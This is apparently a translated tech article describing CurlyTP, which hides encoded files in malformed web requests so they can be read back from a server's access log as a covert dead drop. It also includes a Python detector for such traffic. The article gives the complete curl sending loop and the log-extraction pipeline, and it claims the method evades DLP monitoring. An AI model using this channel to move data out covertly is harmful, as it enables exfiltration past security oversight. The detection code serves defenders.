Exchanging secret messages via web server logs

According to the Wikipedia definition, a dead drop is a tradecraft technique for exchanging information or other items between people through a hidden location. The point is that the people never meet, yet still exchange information, which preserves operational security.

The hiding place must not attract attention. That is why, offline, inconspicuous objects are used: a loose brick in a wall, a library book, or a hollow in a tree.

There are plenty of encryption and steganography tools on the Internet, but the mere use of such tools attracts attention. Moreover, they can be blocked at the corporate or state level. What then?

Developer Ryan Flowers proposed an interesting option: use any web server as a dead drop. Think about what a web server does: it accepts requests, serves files and writes logs. And it logs every request, even malformed ones!

It turns out that any web server lets you store almost any message in its log. Flowers wondered how this could be put to use.

He proposed the following procedure:

  1. Take a text file (the secret message) and compute its hash (md5sum).
  2. Encode it (gzip + uuencode).
  3. Write it into the log by sending deliberately malformed requests to the server.

Local:
# record the hash of the plaintext so the recipient can verify the transfer
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

# compress, then uuencode in base64 mode (-m); gzip leaves g.txt.gz behind
[root@local ~]# gzip g.txt
[root@local ~]# uuencode -m g.txt.gz g.txt.gz > g.txt.gz.uue
# send one line per request; IFS is set to newline so each line stays whole,
# and spaces are replaced with =+= because a URL cannot contain them
[root@local ~]# IFS=$'\n'; for x in $(sed 's/ /=+=/g' g.txt.gz.uue); do curl -s "http://domain.com?transfer?g.txt.gz.uue?$x" > /dev/null; done

To read the file, the same operations are performed in reverse: decode and decompress the file, then check the hash (the hash itself can safely be sent over open channels).

Spaces are replaced with =+= so that the URL contains no spaces. The program, which the author named CurlyTP, uses base64 encoding, just like email attachments. The request carries the keyword ?transfer? so that the recipient can easily find it in the logs.

What do we see in the logs in this case?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

As already mentioned, to receive the secret message you perform the operations in reverse:

Remote machine

# keep only the ?transfer? requests from the chosen minute, take the request
# target (field 7), keep the 4th ?-separated field and restore the spaces
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12 | awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
# decode to a named output file, decompress, and compare the hash
[root@server /home/domain/logs]# uudecode -o g.txt.gz g.txt.gz.uue
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

The process is easy to automate. The md5sum matches, and the file contents confirm that everything was encoded correctly.

The method is extremely simple. "The point of this exercise is just to prove that files can be transferred through innocent-looking web requests, and it works on any web server with plain-text logs. Essentially, every web server is a dead drop!" says Flowers.

Of course, the method only works if the recipient has access to the server logs. But such access is provided, for example, by most hosting providers.

How can it be used?

Ryan Flowers says he is not a security specialist and will not draw up a list of possible uses for CurlyTP. For him it is simply a proof of concept that the familiar tools we see every day can be used in an unconventional way.

In fact, this method has several advantages over other "hidden" servers such as Digital Dead Drop or PirateBox: it requires no special setup on the server side and no special protocol, and it raises no suspicion among those monitoring traffic. It is unlikely that a SORM or DLP system would inspect URLs for compressed text files.
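As a defender's counterpoint to that last claim, here is an added Python example (not from the original article or from CurlyTP) that scans access-log lines in Apache combined format for the pattern the transcript above shows: a query string whose last ?-separated field is a long, high-entropy base64-looking chunk, or one carrying a uuencode begin-base64 header, and then groups hits per client address. The sample log lines are constructed here, modelled on the lines shown above; the 40-character minimum, the 4.5-bit entropy threshold and the two-request minimum are assumed tuning values.

```python
import re
from collections import defaultdict
from math import log2

# Constructed sample in Apache combined log format, modelled on the CurlyTP
# transcript: two ordinary page views plus three smuggled chunks from one client.
SAMPLE_LOG = """\
5.6.7.8 - - [22/Aug/2019:21:10:00 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
5.6.7.8 - - [22/Aug/2019:21:13:00 -0400] "GET /search?q=dead+drop HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Combined-format prefix: client, identd, user, [timestamp] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# One uuencode -m / base64 line: 40+ chars of the base64 alphabet plus optional padding.
B64_RE = re.compile(r'^[A-Za-z0-9+/]{40,}={0,2}$')
ENTROPY_BITS = 4.5  # assumed threshold; a 60-char base64 chunk scores above 5 bits/char


def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * log2(c / n) for c in counts.values())


def is_smuggled_chunk(target):
    """True if the last '?'-field of the query is a uuencode header or base64-like chunk."""
    _, sep, query = target.partition('?')
    if not sep:
        return False
    if 'begin-base64' in query:
        return True
    last = query.rsplit('?', 1)[-1]
    return bool(B64_RE.match(last)) and shannon_entropy(last) > ENTROPY_BITS


def find_log_dead_drops(log_text, min_chunks=2):
    """Return {client_ip: [targets]} for clients sending at least min_chunks suspicious requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_smuggled_chunk(m.group('target')):
            hits[m.group('ip')].append(m.group('target'))
    return {ip: t for ip, t in hits.items() if len(t) >= min_chunks}


if __name__ == '__main__':
    for ip, targets in find_log_dead_drops(SAMPLE_LOG).items():
        print(f'{ip}: {len(targets)} suspicious requests, first target {targets[0][:48]}...')
```

Grouping per client matters because a single odd request is noise, whereas a burst of high-entropy query strings to the same path from one address is the signature of a chunked upload.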

This is just one way of delivering messages through service files. You may remember how some forward-thinking companies used to place job postings for developers in HTTP headers or in the HTML code of their pages.

The idea was that only web developers would notice this Easter egg, since an ordinary person never looks at the headers or the HTML code.

source: www.habr.com
